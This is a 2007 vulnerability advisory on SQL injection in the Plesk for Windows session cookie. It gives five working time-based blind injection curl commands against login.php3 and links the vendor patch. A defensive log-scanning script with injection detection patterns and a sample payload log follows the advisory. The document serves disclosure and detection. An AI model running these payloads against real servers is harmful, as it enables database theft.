hackersafe-plesk.txt

Date: 13 Sep 2007
Reported by: Nick Merritt
Type: packetstorm
Source: packetstormsecurity.com

SWsoft Plesk for Windows - SQL Injection Vulnerability, Remote Attack, Plesk Control Panel, SQL Injection Pages, Patches Availabl

`HackerSafe Labs - Security Advisory  
http://www.hackersafelabs.com  
  
SWsoft Plesk for Windows - SQL Injection Vulnerability  
  
Date: 9-11-07  
Vendor: www.swsoft.com  
Package: Plesk for Windows  
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0  
Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3  
Credit: Nick I Merritt  
  
Risk:  
Related Exploit Range: Remote  
Attack Complexity: Medium  
Level of Authentication Needed: Not Required   
Confidentiality Impact: Major  
Integrity Impact: Major  
Availability Impact: Major  
  
Overview:  
SWsoft Plesk is a comprehensive control panel solution used by leading  
hosting providers worldwide for shared, virtual and dedicated hosting.   
  
Vulnerability:  
A SQL injection vulnerability exists in the Plesk application. Please  
see the following:  
  
SQL Injection Page 1: "login.php3"  
SQL Injection Page 2: "auth.php3"  
SQL Injection Cookie Parameter: "PLESKSESSID"  
  
Example: (Will extract the database user)  
  
1) Delay=5224.3877   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
2) Delay=5165.3031   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
3) Delay=5158.9512   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
4) Delay=5224.0980   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
5) Delay=5241.5251   
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie  
"PLESKSESSID=1' union select if  
(substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3  
from mysql.user/*"  
  
Solution: Apply the following patches - http://kb.swsoft.com/en/2159  
  
`
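A defender-side check for the request pattern shown in the advisory, as an added example that is not part of the original advisory or of Plesk: it scans web log lines for `PLESKSESSID` cookies on `login.php3` / `auth.php3` that are not plain tokens or that carry the SQL constructs used above, and notes when such a request also shows the long delay. The tab-separated log format, the alphanumeric session ID shape, the 3000 ms threshold and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate PLESKSESSID is a short alphanumeric token.
SAFE_SESSID = re.compile(r"[A-Za-z0-9]{1,64}")
# SQL constructs taken from the advisory's example requests.
SQL_MARKERS = re.compile(
    r"union\s+select|benchmark\s*\(|substring\s*\(|mysql\.user|/\*", re.I)
PAGES = {"/login.php3", "/auth.php3"}   # pages named in the advisory
SLOW_MS = 3000                          # assumed latency threshold

def classify(line):
    """Return findings for one tab-separated log line (empty list = clean)."""
    ip, path, ms, cookie_header = line.split("\t")
    cookies = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        cookies[name] = unquote(value)   # decode %27, %20, ... before matching
    sessid = cookies.get("PLESKSESSID")
    if path not in PAGES or sessid is None:
        return []
    findings = []
    if not SAFE_SESSID.fullmatch(sessid):
        findings.append("malformed-sessid")
    if SQL_MARKERS.search(sessid):
        findings.append("sql-in-cookie")
    # Latency alone is noise; it is only reported alongside a suspicious cookie.
    if findings and float(ms) >= SLOW_MS:
        findings.append("timing-delay")
    return findings

def suspicious_sources(lines):
    """Map source IP -> sorted findings seen across all of its requests."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(line.split("\t")[0], set()).update(found)
    return {ip: sorted(f) for ip, f in hits.items()}

# Constructed sample log (ip, path, response ms, Cookie header); not real traffic.
SAMPLE_LOG = [
    "198.51.100.7\t/login.php3\t84.2\tlocale=en-US; PLESKSESSID=9f2c1a7be04d",
    "198.51.100.8\t/login.php3\t4100.0\tPLESKSESSID=77aa01bc93ef",
    "203.0.113.9\t/login.php3\t5224.4\tPLESKSESSID=1' union select if"
    "(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3"
    " from mysql.user/*",
    "203.0.113.9\t/auth.php3\t61.0\tPLESKSESSID=1%27%20union%20select%201,2,3/*",
]
```

Calling `suspicious_sources(SAMPLE_LOG)` reports only the source whose cookies fail the token check; the slow but well-formed request from `198.51.100.8` is not flagged.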

Vulners AI Score: 7.4 (High risk)